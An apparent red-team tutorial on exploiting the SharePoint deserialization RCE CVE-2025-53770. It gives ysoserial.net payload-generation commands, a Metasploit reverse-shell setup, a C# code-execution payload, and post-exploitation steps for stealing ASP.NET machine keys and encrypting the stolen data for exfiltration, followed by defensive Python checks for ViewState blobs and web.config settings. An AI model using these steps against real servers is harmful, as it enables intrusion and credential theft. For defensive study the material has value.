
Introduction
The recent SharePoint Server RCE vulnerability (CVE-2025-53770) has drawn intense interest from red teams because it yields arbitrary code execution through .NET deserialization. This article looks at exploitation techniques built on that primitive: generating custom C# payloads with ysoserial.net gadget chains, wrapping them in the `LosFormatter` (ViewState) format the server deserializes, and working around the limitations of existing Metasploit modules.
Learning Objectives
- Understand the SharePoint RCE (CVE-2025-53770) exploit chain: a gadget such as `TypeConfuseDelegate` delivered inside a `LosFormatter` (ViewState) stream.
- Learn how to generate and test custom C# payloads with ysoserial.net's `ActivitySurrogateSelectorFromFile` and other gadgets.
- Adapt Metasploit modules to carry bespoke deserialization payloads in real-world engagements.
1. Setting Up the Lab Environment
Verified Command (Linux):
docker run -it --rm -v $(pwd)/payloads:/payloads ubuntu:22.04 /bin/bash
Step-by-Step:
- Use Docker to create an isolated, throwaway environment for storing and inspecting payload files.
- Mount a local `payloads` directory to move generated exploit blobs in and out of the container.
- Install the toolchain:
apt update && apt install -y mono-devel dotnet-sdk-6.0
Caveat: ysoserial.net is a .NET Framework executable and most of its gadgets depend on .NET Framework classes, so generate the payloads on a Windows host (next section) and use the container to hold and inspect the output.
2. Generating ysoserial.net Payloads
Verified Command (Windows):
ysoserial.exe -f BinaryFormatter -g ActivitySurrogateSelectorFromFile -o base64 -c "C:\payload.cs"
Step-by-Step:
- Clone ysoserial.net: `git clone https://github.com/pwntester/ysoserial.net`, then build it (Visual Studio or `msbuild`) or use the release build from GitHub.
- For the FromFile gadgets, `-c` is the path to the C# source (`payload.cs`): the gadget compiles it, embeds the resulting assembly in the serialized object, and `-o base64` emits the result as a Base64 string.
- Pick the formatter for the sink, not for the gadget: `-f BinaryFormatter` yields a raw BinaryFormatter stream, while ViewState and other `System.Web.UI` sinks expect `-f LosFormatter`. A bare BinaryFormatter blob dropped into a ViewState field will not parse.
- Test locally with `LosFormatter` deserialization (a small .NET Framework harness calling `new LosFormatter().Deserialize(blob)`) before touching a target. With ViewState MAC enabled the real sink also requires a valid HMAC; ysoserial.net's ViewState plugin (`-p ViewState`) produces a signed blob when given the server's validation key.
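To sanity-check a generated blob before sending it, the following Python inspector is an added example (it is not from the article and not part of ysoserial.net): it Base64-decodes a LosFormatter/ViewState string, confirms the ObjectStateFormatter marker bytes, and scans for a `Token_BinarySerialized` record whose 7-bit length prefix is followed by the fixed BinaryFormatter stream header, which is the record every BinaryFormatter-based gadget chain rides in. It also recognises the bare BinaryFormatter output that `-f BinaryFormatter` produces, so you can see at once when the wrong formatter was chosen. The sample blobs are constructed inline; the benign one encodes Pair(Pair("1234567890", null), null), the shape of an ordinary page ViewState.

```python
import base64

# Constants from System.Web.UI.ObjectStateFormatter, the engine behind LosFormatter.
OSF_MARKER = 0xFF               # Marker_Format: first byte of every stream
OSF_VERSION = 0x01              # Marker_Version_1
TOKEN_PAIR = 0x0F               # Token_Pair
TOKEN_STRING = 0x05             # Token_String: 7-bit length, then UTF-8 bytes
TOKEN_NULL = 0x64               # Token_Null
TOKEN_BINARY_SERIALIZED = 0x32  # Token_BinarySerialized: 7-bit length, then a BinaryFormatter stream

# The 17-byte SerializationHeaderRecord that opens every BinaryFormatter stream:
# record type 0, rootId 1, headerId -1, major version 1, minor version 0.
BF_HEADER = bytes.fromhex("0001000000ffffffff0100000000000000")


def encode_7bit(n):
    """BinaryWriter.Write7BitEncodedInt."""
    out = bytearray()
    while n >= 0x80:
        out.append((n & 0x7F) | 0x80)
        n >>= 7
    out.append(n)
    return bytes(out)


def decode_7bit(buf, pos):
    """BinaryReader.Read7BitEncodedInt at buf[pos:]; returns (value, position after it)."""
    value = shift = 0
    while True:
        b = buf[pos]
        pos += 1
        value |= (b & 0x7F) << shift
        if not b & 0x80:
            return value, pos
        shift += 7
        if shift > 35:
            raise ValueError("7-bit encoded int is too long")


def inspect_viewstate(b64_blob):
    """Report what a Base64 LosFormatter / ViewState / ysoserial.net blob contains."""
    raw = base64.b64decode(b64_blob)
    report = {
        "length": len(raw),
        "objectstateformatter": len(raw) >= 2 and raw[0] == OSF_MARKER and raw[1] == OSF_VERSION,
        "bare_binaryformatter": raw.startswith(BF_HEADER),  # what `-f BinaryFormatter` emits
        "embedded_binaryformatter": False,
        "embedded_offset": None,
        "embedded_length": None,
    }
    if not report["objectstateformatter"]:
        return report
    # Heuristic scan rather than a full token parse: a Token_BinarySerialized byte only
    # counts when its length prefix is immediately followed by the BinaryFormatter header.
    for i in range(2, len(raw)):
        if raw[i] != TOKEN_BINARY_SERIALIZED:
            continue
        try:
            length, start = decode_7bit(raw, i + 1)
        except (IndexError, ValueError):
            continue
        if raw.startswith(BF_HEADER, start) and start + length <= len(raw):
            report.update(embedded_binaryformatter=True, embedded_offset=i, embedded_length=length)
            break
    return report


def b64(raw):
    return base64.b64encode(raw).decode()


def build_binary_serialized_blob(payload_after_header):
    """Construct an ObjectStateFormatter stream whose root is a BinaryFormatter object.
    Stand-in for what `ysoserial.exe -f LosFormatter` emits; the bytes after the
    header are a placeholder here, not a gadget chain."""
    body = BF_HEADER + payload_after_header
    head = bytes([OSF_MARKER, OSF_VERSION, TOKEN_BINARY_SERIALIZED])
    return b64(head + encode_7bit(len(body)) + body)


# Constructed benign sample: Pair(Pair("1234567890", null), null).
BENIGN_VIEWSTATE = b64(
    bytes([OSF_MARKER, OSF_VERSION, TOKEN_PAIR, TOKEN_PAIR, TOKEN_STRING]) + encode_7bit(10)
    + b"1234567890" + bytes([TOKEN_NULL, TOKEN_NULL])
)

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_VIEWSTATE),
                       ("binary-serialized", build_binary_serialized_blob(b"\x0b"))):
        print(name, inspect_viewstate(blob))
```

A MAC-protected ViewState still decodes here because the HMAC is appended after the stream; an encrypted one (`viewStateEncryptionMode="Always"`) is opaque and is reported as not ObjectStateFormatter. Running the inspector on the output of the Windows command above shows `bare_binaryformatter` rather than `embedded_binaryformatter`, which is exactly why that output cannot go into a ViewState field as-is.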
3. Integrating with Metasploit
Verified Commands (msfconsole; the module path is the one the article names, confirm it with `search sharepoint` in your Framework version):
use exploit/multi/http/sharepoint_rce
set RHOSTS <target>
set PAYLOAD windows/x64/meterpreter/reverse_https
set LHOST <attacker>
exploit
Step-by-Step:
- `PAYLOAD` in the Metasploit datastore names a Framework payload (the stager), not a file, so assigning `File.read('payload.bin')` to it does nothing useful. To use a ysoserial.net chain, edit the module's Ruby where it builds the serialized object and substitute your gadget there, or use a file option if the module exposes one (`show advanced`).
- Encoding the chain as a binary blob does not bypass any check. A LosFormatter/ViewState payload is deserialized only if its HMAC validates against the target's ASP.NET machineKey, so the chain has to be signed with the real validation key; obtaining that key is the subject of section 5.
4. Bypassing .cs File Execution Limits
Verified Gadget Chain (C#):
// payload.cs: the gadget compiles this file, loads it during deserialization and instantiates the class, so the constructor is the entry point (top-level statements will not compile with the CodeDOM compiler it uses)
using System.Diagnostics;
class E
{
    public E() { Process.Start("calc.exe"); }
}
Step-by-Step:
1. Use the `DataSetOldBehaviourFromFile` gadget where the target runs an older .NET Framework: it also takes a C# file but rides on `DataSet` deserialization instead of the `ActivitySurrogateSelector`.
2. `LosFormatter` is not a sandbox. What blocks a chain is (a) ViewState MAC validation and (b) on .NET Framework 4.8 and later, the type check that rejects `ActivitySurrogateSelector` unless the `DisableActivitySurrogateSelectorTypeCheck` switch is set; ysoserial.net ships the `ActivitySurrogateDisableTypeCheck` gadget to flip that switch with a first payload before the real one is sent.
5. Post-Exploitation: Leaking Machine Keys
Verified Command (Post-Exploit):
Get-ChildItem "C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\" | Select-Object Name
Step-by-Step:
1. Note what this lists: the `MachineKeys` folder holds CryptoAPI/CNG private-key containers (certificate and DPAPI material), not the ASP.NET `machineKey`. The validationKey and decryptionKey that make a forged LosFormatter payload acceptable live in the web application's `web.config` (`<machineKey>` under `<system.web>`); those are the values to read.
2. Use C# `File.ReadAllText()` and `Directory.GetFiles()` from inside the deserialization payload to collect them.
3. Encrypt exfiltrated data with `AesCryptoServiceProvider` (or `Aes.Create()`) before moving it.
Caveat for defenders: once these keys have been read, patching alone does not close the door; the ASP.NET machine keys must be rotated and IIS restarted.
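As the defender-side counterpart to the key leak above (and to the web.config advice in the closing section), the following Python audit is an added example, not from the article: it parses a web.config and reports the settings that decide whether a forged LosFormatter payload would be accepted. The two configs are constructed samples with placeholder key values; the severity labels and the `audit_machine_key` / `worst_severity` names are the example's own.

```python
import xml.etree.ElementTree as ET

# Constructed sample: the shape of a weak web.config (key values are placeholders).
WEAK_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <machineKey validationKey="0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF"
                decryptionKey="FEDCBA9876543210FEDCBA9876543210"
                validation="SHA1" decryption="3DES" />
    <pages enableViewStateMac="false" />
  </system.web>
</configuration>
"""

# Constructed sample after hardening: a static key is still present (a farm needs the
# same key on every front end), but with modern algorithms and MAC enforced.
HARDENED_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <machineKey validationKey="0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF"
                decryptionKey="FEDCBA9876543210FEDCBA9876543210"
                validation="HMACSHA256" decryption="AES" />
    <pages enableViewStateMac="true" viewStateEncryptionMode="Always" />
  </system.web>
</configuration>
"""

WEAK_VALIDATION = {"MD5", "SHA1"}
WEAK_DECRYPTION = {"DES", "3DES"}


def audit_machine_key(xml_text):
    """Return (severity, message) findings for the ViewState-related settings."""
    root = ET.fromstring(xml_text)
    findings = []
    mk = root.find("./system.web/machineKey")
    if mk is None:
        findings.append(("info", "no <machineKey>: keys are auto-generated per server, so a "
                                 "payload signed with a key taken elsewhere will not validate here"))
    else:
        if "AutoGenerate" not in mk.get("validationKey", "AutoGenerate"):
            findings.append(("info", "static validationKey present: anyone who can read this file "
                                     "can sign ViewState; rotate it if the file may have been read"))
        validation = mk.get("validation", "HMACSHA256").upper()
        if validation in WEAK_VALIDATION:
            findings.append(("medium", f"validation={validation}: weak MAC algorithm, use HMACSHA256 or stronger"))
        decryption = mk.get("decryption", "Auto").upper()
        if decryption in WEAK_DECRYPTION:
            findings.append(("medium", f"decryption={decryption}: legacy cipher, use AES"))
    pages = root.find("./system.web/pages")
    if pages is not None and pages.get("enableViewStateMac", "true").lower() == "false":
        # If honoured this is fatal: any unsigned LosFormatter blob is deserialized, no key
        # needed. ASP.NET 4.5.2 and later ignore the setting, but the intent is still wrong.
        findings.append(("critical", "enableViewStateMac=false: MAC validation disabled in config"))
    return findings


def worst_severity(findings):
    order = {"info": 0, "medium": 1, "critical": 2}
    return max((s for s, _ in findings), key=order.get, default="none")


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_WEB_CONFIG), ("hardened", HARDENED_WEB_CONFIG)):
        print(name, worst_severity(audit_machine_key(cfg)))
        for severity, message in audit_machine_key(cfg):
            print("  ", severity, message)
```

On a SharePoint farm run this against each web application's web.config; a static key is expected there, and the actionable finding after an incident is the rotation reminder rather than the key's mere presence.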
What Undercode Say:
- Key Takeaway 1: ysoserial.net's `ActivitySurrogateSelectorFromFile` is unreliable for SharePoint RCE (the .NET Framework 4.8 type check rejects it unless it is disabled first); opt for `TypeConfuseDelegate` inside a manually built and MAC-signed `LosFormatter` stream.
- Key Takeaway 2: Metasploit's current module expects a pre-generated chain; injecting C# at runtime fails because the compiled assembly has to be embedded in the serialized object before that object is signed and sent.
Analysis: The exploit's reliance on `LosFormatter` limits flexibility, since every payload must pass MAC validation. Future patches may enforce stricter type validation, but for now attackers can chain gadgets such as `TextFormattingRunProperties` for indirect code execution.
Prediction:
`ActivitySurrogateSelector` has already been blocked by a type check since .NET Framework 4.8; Microsoft will likely tighten deserialization type filtering in SharePoint further by Q4 2025, pushing red teams toward indirect gadget chains or process injection. There is no web.config switch that turns `LosFormatter` off, and `enableViewStateMac="false"` has been ignored since .NET 4.5.2; enterprises should instead apply the SharePoint security updates, rotate the ASP.NET machine keys, and enable AMSI integration for SharePoint.
Reported By: Alex Reid – Hackers Feeds


